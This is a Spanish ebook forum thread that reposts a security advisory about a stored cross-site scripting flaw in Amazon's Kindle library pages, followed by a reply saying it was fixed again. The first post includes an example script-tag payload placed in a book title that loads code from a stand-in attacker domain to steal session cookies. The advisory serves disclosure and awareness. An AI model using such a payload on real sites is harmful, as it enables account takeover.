Google+  

Resultados 1 al 2 de 2

Tema: Vulnerabilidad en Kindle permite obtener detalles de la cuenta de usuario

  1. #1
    Fecha de Ingreso
    29 may, 13
    Ubicación
    Buenos Aires
    Mensajes
    6
    Dar gracias
    1
    Gracias Recibidas: 4

    Vulnerabilidad en Kindle permite obtener detalles de la cuenta de usuario

    Se ha anunciado una vulnerabilidad en el software del Kindle de Amazon que podría permitir a un atacante acceder a todos los detalles de una cuenta de Amazon.

    El problema reside en un cross-site scripting almacenado, la más peligrosa de todas las formas de este tipo de ataques, en la librería Kindle de Amazon, en las páginas conocidas como "Manage Your Content and Devices" y "Manage your Kindle". El fallo se produce al descargar un libro electrónico desde un sitio que no sea la propia web de Amazon, y podría permitir inyectar código malicioso a través de los metadatos del libro (por ejemplo el título).

    El atacante podrá crear un libro con un título como <script src="https://www.atacante.org/script.js"></script>
    Una vez que la víctima descargue el libro y lo tenga añadido a su librería, el código se ejecutara en el momento en que la víctima abra la página web de la librería del Kindle. Como resultado, el atacante podrá acceder y transferir las cookies de sesión de Amazón, por lo que la cuenta quedará comprometida. Existe disponible una prueba de concepto del problema.

    Lo más sorprendente es que según Benjamin Daniel Mussler, investigador que ha dado a conocer el problema, reportó el problema a Amazon en noviembre de 2013 y fue corregido poco después. Sin embargo confirma que, hace dos meses, al publicar una nueva versión de la aplicación web "Manage your Kindle" se ha reintroducido la vulnerabilidad. Según confirma no ha obtenido respuesta a ninguna de sus comunicaciones.

    Opina sobre esta noticia:
    http://unaaldia.hispasec.com/2014/09....html#comments

    Más información:

    Amazon.com Stored XSS via Book Metadata
    http://b.fl7.de/2014/09/amazon-store...-metadata.html


    Antonio Ropero
    [email protected]
    Twitter: @aropero

  2. #2
    Avatar de flipado
    Hombre flipado está desconectado [email protected] Mi eReader: Kobo H2O, PaperWhite y Kindle 4
    Autores Favoritos: Vázquez-Figueroa, A. Conan Doyle
    Libros Favoritos: El Clan del Oso Cavernario. El nombre de la rosa Buscarlo en amazon.es
    Leyendo: El que toca cada semana :) Buscarlo en amazon.es
    Fecha de Ingreso
    20 ago, 12
    Ubicación
    Gipuzkoa
    Mensajes
    1.098
    Dar gracias
    760
    Gracias Recibidas: 881

    Re: Vulnerabilidad en Kindle permite obtener detalles de la cuenta de usuario

    en éste hilo ya se habló de ello y de que ya se ha solucionado... por segunda vez :)
    Mis Recuentos: 2017 - 2016 - 2015 - 2014 - 2013
    GoodReads

    si tu no kiers mplear n poko d tu tmpo n scrivr d form q s t ntnda sin ncsidad d trduccn, no pids q inviert l mio n dscfrarlo

  3. Los siguientes usuarios le agradecieron a flipado por Post util:

    torgar (23/09/2014)

Temas Similares

  1. Una vulnerabilidad en Kindle permite acceder a los datos de la cuenta
    Por Ex Perpento en el foro Kindle - Noticias, Actualidad y Mundo de ebooks
    Respuestas: 8
    Último Mensaje: 09/01/2015, 00:19
  2. Duda gestión de pagos en cuenta usuario amazon
    Por juanpardo en el foro Amazon España (Amazon.es)
    Respuestas: 4
    Último Mensaje: 06/04/2013, 15:35
  3. Kindle con publicidad. Amazon no permite quitarla.
    Por andrests en el foro Kindle - Noticias, Actualidad y Mundo de ebooks
    Respuestas: 10
    Último Mensaje: 29/03/2012, 19:55
  4. Libro que describa escena con muchos detalles...
    Por otherme en el foro Petición de libros
    Respuestas: 14
    Último Mensaje: 05/03/2012, 08:15
  5. Kindle sin publicidad, Amazon te permite suscribirte ahora
    Por germanor en el foro Kindle - Noticias, Actualidad y Mundo de ebooks
    Respuestas: 12
    Último Mensaje: 20/11/2011, 16:15

Permisos de Publicación

  • No puedes crear nuevos temas
  • No puedes responder temas
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •  
Google Hablamos de: amazon.es Código o Cupón Descuentos para Kindle, Ofertas Kindle, Kindle Amazon, kindle paperwhite, kindle 4, Opiniones Kindle, Reseña Kindle, Comentarios Kindle, Análisis Kindle, Tutorial Kindle, ayuda venta segunda mano funda kindle precio kindle manual kindle autores lectores ebook formatos epub pdf

Site Map | Ofertas Hogar | Juguetes Juegos | Ofertas Deporte | Offerte Video Giochi | Offerte Giocatto | Mejores Precios | Mejores Móviles Calidad Precio | Mejor Ebook